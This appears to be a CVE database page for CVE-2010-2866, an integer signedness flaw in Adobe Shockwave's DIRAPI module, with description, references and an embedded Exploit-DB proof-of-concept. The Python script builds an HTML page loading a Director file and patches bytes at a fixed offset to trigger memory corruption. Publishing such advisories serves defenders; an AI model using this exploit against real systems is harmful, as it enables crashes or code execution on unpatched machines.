CVE-2010-2866
Description
Integer signedness error in the DIRAPI module in Adobe Shockwave Player before 11.5.8.612 allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a count value associated with an "undocumented structure" and the tSAC chunk in a Director movie.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Adobe Shockwave Director tSAC - Chunk Memory Corruption
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
'''
'''
Title : Adobe Shockwave Director tSAC Chunk memory corruption
Version : dirapi.dll 11.5.7
Analysis : http://www.abysssec.com
Vendor : http://www.adobe.com
Impact : Med/High
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
http://www.exploit-db.com/moaub-22-adobe-shockwave-director-tsac-chunk-memory-corruption/
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15076.zip (moaub-22-exploit.zip)
'''
import sys
temp = """<!-- saved from url=(0013)about:internet -->
<object classid="clsid:233C1507-6A77-46A4-9443-F871F945D258"
codebase="http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab#version=11,5,0,593"
ID=wineglass>
<param name=src value="poc.dir">
<param name=PlayerVersion value=11>
</object>
"""
htmlTest = open('poc.html', 'wb')
htmlTest.write(temp)
htmlTest.close()
sampleFile = open('sample.dir','rb')
pocFile = open("poc.DIR",'wb')
pocFile.write(sampleFile.read(-1))
sampleFile.close()
pocFile.seek(13168)
pocFile.write("\xff\xff\xff\xff\x11\x11")
pocFile.close() Application impact
References
- http://dvlabs.tippingpoint.com/advisory/TPTI-10-13
- http://www.adobe.com/support/security/bulletins/apsb10-20.html
- http://www.securityfocus.com/archive/1/513301/100/0/threaded
- http://www.securitytracker.com/id?1024361
- http://www.vupen.com/english/advisories/2010/2176
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11932
- http://dvlabs.tippingpoint.com/advisory/TPTI-10-13
- http://www.adobe.com/support/security/bulletins/apsb10-20.html
- http://www.securityfocus.com/archive/1/513301/100/0/threaded
- http://www.securitytracker.com/id?1024361
- http://www.vupen.com/english/advisories/2010/2176
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11932
CWEs
CWE-189
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.